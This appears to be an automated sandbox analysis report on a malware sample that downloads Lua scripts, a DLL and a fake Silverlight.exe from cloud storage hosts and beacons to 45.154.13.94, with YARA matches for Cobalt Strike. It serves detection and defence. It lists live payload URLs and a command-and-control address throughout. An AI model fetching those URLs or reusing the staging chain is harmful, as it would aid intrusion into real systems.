JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8

Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94
Source: unknown	TCP traffic detected without corresponding DNS query: 45.154.13.94

Source: C:\5a70dbc53fcf0baade86ff\microsoft_defaults.exe

Code function: 19_2_00222A50 IsNetworkAlive,InternetOpenW,InternetSetOptionW,InternetOpenUrlW,HttpQueryInfoW,CreateFileW,InternetReadFile,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,

19_2_00222A50

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: AliyunOSSDate: Mon, 12 Jul 2021 08:29:45 GMTContent-Type: application/zipContent-Length: 16124619Connection: closex-oss-request-id: 60EBFD799BA4CD8693C48BF4Accept-Ranges: bytesETag: "55A7B6D67A84D10B92E16D895836F217"Last-Modified: Wed, 16 Jun 2021 10:22:41 GMTx-oss-object-type: Normalx-oss-hash-crc64ecma: 5738892971117464177x-oss-storage-class: StandardContent-Disposition: attachmentx-oss-force-download: trueContent-MD5: Vae21nqE0QuS4W2JWDbyFw==x-oss-server-time: 38Data Raw: 50 4b 03 04 14 00 00 00 00 00 4a 6e 72 52 00 00 00 00 00 00 00 00 00 00 00 00 14 00 00 00 53 68 65 6c 6c 45 78 70 65 72 69 65 6e 63 65 48 6f 73 74 2f 50 4b 03 04 14 00 00 00 08 00 aa 7c 6c 52 ed d8 8c 63 25 18 00 00 38 2d 00 00 33 00 00 00 53 68 65 6c 6c 45 78 70 65 72 69 65 6e 63 65 48 6f 73 74 2f 61 70 69 2d 6d 73 2d 77 69 6e 2d 63 6f 72 65 2d 66 69 6c 65 2d 6c 31 2d 32 2d 30 2e 64 6c 6c ed 59 09 3c 54 5b 18 bf b3 18 66 ac 99 90 7d 44 29 32 ee 8c bd ac d9 12 22 64 8b 18 0c 26 cc 4c 33 63 4d 65 a6 d2 f2 4a a4 14 a5 90 1e ed 5a 9e 57 52 a1 b4 bc b2 a5 47 ab 94 24 a5 44 49 f5 52 ef dc b1 b6 bc fd bd df 5b 7e ef 70 ee 3d df 77 be f3 9d ef 7e e7 3b ff 7b be 3b ae fe e9 10 06 82 20 2c a8 1f 3e 40 d0 71 68 b0 58 43 bf 5c 2e 82 2a a5 5e 26 05 1d c3 d7 68 1c 47 b9 d4 68 78 45 32 b8 24 36 87 15 c1 a1 c5 90 42 69 4c 26 8b 47 0a a1 93 38 b1 4c 12 83 49 b2 73 f3 24 c5 b0 c2 e8 64 49 49 82 d6 90 8e 03 18 f1 ca ce 10 fa c6 e1 3a 80 a7 67 3e 12 de 69 99 4f 84 f7 9c 8d 83 74 84 90 ef c1 08 8d 44 e4 3e b5 c5 dd 1e 82 c2 52 d1 50 c8 43 45 bd 61 de 73 68 22 49 1c 2d 35 5e 48 88 8d 11 96 11 5e 53 50 c3 6d 34 04 11 a0 e1 3a 54 e0 41 a7 68 5e 81 80 7f 82 51 80 18 19 3b dc 18 bd 8d 36 83 c1 c5 05 35 66 2e 12 b0 03 33 86 96 80 20 53 8d 8f 6d f1 82 fe bc 42 e6 84 d1 78 34 08 8a 46 0f 19 84 15 d6 8f 8a 35 f8 27 73 b8 9c 50 68 c8 36 d2 90 8c d8 27 72 bf 2e 0c fe 2f ff f2 32 bc 67 90 90 31 05 75 ff 38 50 45 3e ee 93 04 35 0c d4 07 e3 40 1d d3 37 1c f7 c8 7e 9e 25 0b 2a ee a7 f5 97 00 41 d4 98 90 5c 0d e8 ad a0 16 83 7a 1b d4 f7 a0 1a 03 fd 02 50 eb 41 bb 07 d4 f1 a0 4d 03 15 19 89 06 3b 91 c6 66 e8 c5 70 f5 e2 19 4c bd 50 16 87 ae 17 ce 88 a6 eb 45 53 f4 a8 7a 30 39 2c 3a 1a b2 e5 d0 69 3c ba 03 e0 52 a1 28 3a 87 49 8f 36 a0 92 c7 32 1d e9 3c 2f 7a 0c db 9d c6 8b f4 19 95 f8 88 0b 08 6f 56 74 6c 0c 7d 0e 2d 86 ee c0 e2 0c 12 ae ac 58 26 cf 9d c5 60 f2 c6 8c fb 65 d1 11 09 44 37 22 c5 1d 11 43 a8 31 ba 7e 51 d2 c3 d3 ce d3 da 6b d3 9d 75 7e 65 95 50 fb d9 42 d3 75 aa cb 80 3f 7f d6 27 ec b0 90 11 9c 09 1e c1 87 51 9c 22 d3 11 7a 70 cd 2b 46 fa b5 92 92 92 c2 42 22 84 f8 35 38 4e 88 17 5a 30 05 61 05 03 5e 3a 66 84 47 1d 12 83 3e b5 ed f5 a9 6d 12 f3 45 d6 3b ea 1c 16 b3 14 c6 c0 ff e5 1f 5e 50 c2 bd 3c 01 bc 1b 3f e1 0b f7 2d fc 05 3e 1e 0b f6 fc 50 4c ac c3 7c ae 31 19 63 08 ae de 90 27 14 04 ae f6 90 07 68 39 41 6e d0 1c 40 3b 81 ab 03 68 23 e5 14 b6 fb fd 20 3a 10 c0 95 36 7b f8 6e 35 a4 07 0b fe d0 9f e8 be Data Ascii: PKJnrR

Source: global traffic	HTTP traffic detected: GET /Silverlight.exe HTTP/1.1accept: /host: softres.oss-accelerate.aliyuncs.com
Source: global traffic	HTTP traffic detected: GET /x86/1-CS-443.lua HTTP/1.1
Source: global traffic	HTTP traffic detected: GET /x86/Schedule.lua HTTP/1.1
Source: global traffic	HTTP traffic detected: GET /x86/ScheduleTask.dll HTTP/1.1
Source: global traffic	HTTP traffic detected: GET /ShellExperienceHost.zip HTTP/1.1

Source: unknown

DNS traffic detected: queries for: softres.oss-accelerate.aliyuncs.com

Source: luac.exe, 00000003.00000002.485998444.0000000000890000.00000004.00000001.sdmp, lua.exe, 0000002C.00000003.339789802.000000000095F000.00000004.00000001.sdmp, lua.exe, 0000002C.00000003.340221655.0000000000954000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:
Source: lua.exe, 0000002C.00000003.340133863.00000000009F5000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:43990
Source: luac.exe, 00000003.00000002.485998444.0000000000890000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:T
Source: install.exe	String found in binary or memory: http://g.msn.com/1ewenusDefaultPack/MSA_Link0http://g.msn.com/1ewenusDefaultPack/Privacy_Link
Source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp	String found in binary or memory: http://g.msn.com/1ewenusDefaultPack/MSA_Link0http://g.msn.com/1ewenusDefaultPack/Privacy_LinkPA
Source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	String found in binary or memory: http://g.msn.com/1ewenusDefaultPack/MSA_Link_ARAR5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_A
Source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	String found in binary or memory: http://g.msn.com/1ewenusDefaultPack/MSA_Link_BGBG5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_B
Source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	String found in binary or memory: http://g.msn.com/1ewenusDefaultPack/MSA_Link_CAES5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_C
Source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	String found in binary or memory: http://g.msn.com/1ewenusDefaultPack/MSA_Link_CSCZ5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_C
Source: install.exe	String found in binary or memory: http://g.msn.com/1ewenusDefaultPack/MSA_Link_DADK5http://
Source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp	String found in binary or memory: http://g.msn.com/1ewenusDefaultPack/MSA_Link_DADK5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_D
Source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	String found in binary or memory: http://g.msn.com/1ewenusDefaultPack/MSA_Link_DEDE5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_D
Source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	String found in binary or memory: http://g.msn.com/1ewenusDefaultPack/MSA_Link_ELGR5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_E
Source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	String found in binary or memory: http://g.msn.com/1ewenusDefaultPack/MSA_Link_ESES5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_E
Source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	String found in binary or memory: http://g.msn.com/1ewenusDefaultPack/MSA_Link_ETEE5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_E
Source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	String found in binary or memory: http://g.msn.com/1ewenusDefaultPack/MSA_Link_EUES5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_E
Source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	String found in binary or memory: http://g.msn.com/1ewenusDefaultPack/MSA_Link_FIFI5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_F
Source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	String found in binary or memory: http://g.msn.com/1ewenusDefaultPack/MSA_Link_FRFR5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_F
Source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	String found in binary or memory: http://g.msn.com/1ewenusDefaultPack/MSA_Link_HEIL5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_H
Source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	String found in binary or memory: http://g.msn.com/1ewenusDefaultPack/MSA_Link_HRHR5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_H
Source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	String found in binary or memory: http://g.msn.com/1ewenusDefaultPack/MSA_Link_HUHU5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_H
Source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	String found in binary or memory: http://g.msn.com/1ewenusDefaultPack/MSA_Link_IDID5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_I
Source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	String found in binary or memory: http://g.msn.com/1ewenusDefaultPack/MSA_Link_ITIT5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_I
Source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	String found in binary or memory: http://g.msn.com/1ewenusDefaultPack/MSA_Link_JAJP5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_J
Source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	String found in binary or memory: http://g.msn.com/1ewenusDefaultPack/MSA_Link_KKKZ5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_K
Source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	String found in binary or memory: http://g.msn.com/1ewenusDefaultPack/MSA_Link_KOKR5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_K
Source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	String found in binary or memory: http://g.msn.com/1ewenusDefaultPack/MSA_Link_LTLT5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_L
Source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	String found in binary or memory: http://g.msn.com/1ewenusDefaultPack/MSA_Link_LVLV5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_L
Source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	String found in binary or memory: http://g.msn.com/1ewenusDefaultPack/MSA_Link_MSMY5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_M
Source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	String found in binary or memory: http://g.msn.com/1ewenusDefaultPack/MSA_Link_NBNO5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_N
Source: install.exe	String found in binary or memory: http://g.msn.com/1ewenusDefaultPack/MSA_Link_NLNL5http://g.msn.com/1ewenusDefaultPack/
Source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp	String found in binary or memory: http://g.msn.com/1ewenusDefaultPack/MSA_Link_NLNL5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_N
Source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	String found in binary or memory: http://g.msn.com/1ewenusDefaultPack/MSA_Link_PLPL5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_P
Source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	String found in binary or memory: http://g.msn.com/1ewenusDefaultPack/MSA_Link_PTBR5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_P
Source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	String found in binary or memory: http://g.msn.com/1ewenusDefaultPack/MSA_Link_PTPT5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_P
Source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	String found in binary or memory: http://g.msn.com/1ewenusDefaultPack/MSA_Link_RORO5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_R
Source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	String found in binary or memory: http://g.msn.com/1ewenusDefaultPack/MSA_Link_RURU5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_R
Source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	String found in binary or memory: http://g.msn.com/1ewenusDefaultPack/MSA_Link_SISI5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_S
Source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	String found in binary or memory: http://g.msn.com/1ewenusDefaultPack/MSA_Link_SKSK5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_S
Source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	String found in binary or memory: http://g.msn.com/1ewenusDefaultPack/MSA_Link_SRCYRL7http://g.msn.com/1ewenusDefaultPack/Privacy_Link
Source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	String found in binary or memory: http://g.msn.com/1ewenusDefaultPack/MSA_Link_SRLATN7http://g.msn.com/1ewenusDefaultPack/Privacy_Link
Source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	String found in binary or memory: http://g.msn.com/1ewenusDefaultPack/MSA_Link_SVSE5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_S
Source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	String found in binary or memory: http://g.msn.com/1ewenusDefaultPack/MSA_Link_THTH5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_T
Source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	String found in binary or memory: http://g.msn.com/1ewenusDefaultPack/MSA_Link_TRTR5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_T
Source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	String found in binary or memory: http://g.msn.com/1ewenusDefaultPack/MSA_Link_UKUA5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_U
Source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	String found in binary or memory: http://g.msn.com/1ewenusDefaultPack/MSA_Link_VIVN5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_V
Source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	String found in binary or memory: http://g.msn.com/1ewenusDefaultPack/MSA_Link_ZHCN5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_Z
Source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	String found in binary or memory: http://g.msn.com/1ewenusDefaultPack/MSA_Link_ZHTW5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_Z
Source: microsoft_defaults.exe	String found in binary or memory: http://g.msn.com/1ewenusDefaultPack/SLV5_DefaultPack
Source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, microsoft_defaults.exe, 00000013.00000002.255409971.0000000000230000.00000002.00020000.sdmp	String found in binary or memory: http://g.msn.com/1ewenusDefaultPack/SLV5_DefaultPackopenen-usBingServicestartedtemp
Source: lua.exe, 0000002C.00000003.340221655.0000000000954000.00000004.00000001.sdmp	String found in binary or memory: http://lualibs.oss-accelerate.aliyuncs.com/x86/ScheduleTask.dll
Source: lua.exe, 0000002C.00000003.340221655.0000000000954000.00000004.00000001.sdmp	String found in binary or memory: http://lualibs.oss-accelerate.aliyuncs.com/x86/ScheduleTask.dllmo
Source: luac.exe, 00000003.00000002.485998444.0000000000890000.00000004.00000001.sdmp	String found in binary or memory: http://lualibs.oss-cn-hongkong.aliyuncs.com/x86/1-CS-443.lua
Source: luac.exe, 00000003.00000002.482270263.0000000000435000.00000004.00000020.sdmp	String found in binary or memory: http://lualibs.oss-cn-hongkong.aliyuncs.com/x86/Schedule.lua
Source: lua.exe, 0000002C.00000003.339789802.000000000095F000.00000004.00000001.sdmp, lua.exe, 0000002C.00000003.346001786.0000000000960000.00000004.00000001.sdmp	String found in binary or memory: http://softres.oss-accelerate.aliyuncs.com/ShellExperienceHost.zip
Source: WhQZ6UbCEY.exe, 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp, WhQZ6UbCEY.exe, 00000001.00000003.230056102.00000246AF9C8000.00000004.00000001.sdmp	String found in binary or memory: http://softres.oss-accelerate.aliyuncs.com/Silverlight.exe

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789

Source: unknown

HTTPS traffic detected: 45.154.13.94:443 -> 192.168.2.3:49724 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Source: Silverlight.exe, 00000006.00000002.402169338.000000000046A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000003.00000002.491261145.0000000001E80000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects CobaltStrike sleep_mask decoder Author: yara@s3c.za.net
Source: 00000003.00000002.491261145.0000000001E80000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 00000003.00000002.493743865.0000000002460000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects CobaltStrike sleep_mask decoder Author: yara@s3c.za.net
Source: 00000003.00000002.493743865.0000000002460000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net

Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Code function: 1_2_00007FF7BF6BF3FC NtDeviceIoControlFile,RtlNtStatusToDosError,	1_2_00007FF7BF6BF3FC
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Code function: 1_2_00007FF7BF6BDAA9 NtCancelIoFileEx,RtlNtStatusToDosError,	1_2_00007FF7BF6BDAA9
Source: C:\Users\user\AppData\Roaming\Silverlight.exe	Code function: 6_2_01003321 NtOpenProcessToken,NtAdjustPrivilegesToken,NtClose,NtClose,	6_2_01003321
Source: C:\Users\user\AppData\Roaming\Silverlight.exe	Code function: 6_2_01003291 NtOpenProcessToken,NtAdjustPrivilegesToken,NtClose,NtClose,	6_2_01003291
Source: C:\Users\user\AppData\Roaming\Silverlight.exe	Code function: 6_2_0100369A OpenEventA,WaitForSingleObject,CloseHandle,Sleep,LoadLibraryA,GetProcAddress,WaitForSingleObject,GetLastError,InitiateSystemShutdownA,GetLastError,WaitForSingleObject,GetLastError,_snprintf,GetVersionExA,GetVersionExA,GetVersionExA,GetSystemDirectoryA,strchr,CreateFileA,FlushFileBuffers,CloseHandle,NtShutdownSystem,FreeLibrary,	6_2_0100369A

Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe

Code function: 1_2_00007FF7BF6BF3FC: NtDeviceIoControlFile,RtlNtStatusToDosError,

1_2_00007FF7BF6BF3FC

Source: C:\Users\user\AppData\Roaming\Silverlight.exe

